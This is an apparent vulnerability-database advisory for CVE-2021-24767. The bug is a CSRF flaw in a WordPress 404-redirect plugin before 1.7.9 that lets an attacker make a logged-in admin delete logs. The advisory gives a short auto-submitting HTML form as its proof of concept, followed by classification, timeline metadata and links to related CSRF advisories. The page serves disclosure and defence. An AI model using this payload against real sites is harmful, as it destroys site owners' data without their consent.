Redirect 404 Error Page to Homepage or Custom Page with Logs < 1.7.9 – Log Deletion via CSRF | CVE 2021-24767 | Plugin Vulnerabilities

Description

The plugin does not check for CSRF when deleting logs, which could allow attacker to make a logged in admin delete them via a CSRF attack

Proof of Concept

<form action="https://example.com/wp-admin/admin.php?page=redirect-404-error-page-to-homepage-or-custom-page-404-log-report" method="post" id="csrf">
<input type="hidden" name="action" value="bulk-delete">
<input type="hidden" name="bulk-delete[]" value="1">
</form><script>csrf.submit()</script>

Affects Plugins

redirect-404-error-page-to-homepage-or-custom-page

Fixed in 1.7.9

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

0b35ad4a-3d94-49b1-a98d-07acf8dd4962

Timeline

Publicly Published

2021-10-06 (about 4 years ago)

Added

2021-10-06 (about 4 years ago)

Last Updated

2022-04-09 (about 3 years ago)

Other

Published

Title

Published

2020-10-29

Title

WordPress < 5.5.2 - Cross-Site Request Forgery (CSRF) to Change Theme Background

Published

2025-11-10

Title

USB Qr Code Scanner For Woocommerce <= 1.0.0 - Cross-Site Request Forgery to Settings Update

Published

2023-10-26

Title

WP Knowledgebase <= 1.3.4 - CSRF

Published

2025-01-17

Title

ShipWorks Connector for Woocommerce < 5.2.6 - Cross-Site Request Forgery to Service Password/Username Update

Published

2024-04-11

Title

Float menu < 6.0.1 - Menu Deletion via CSRF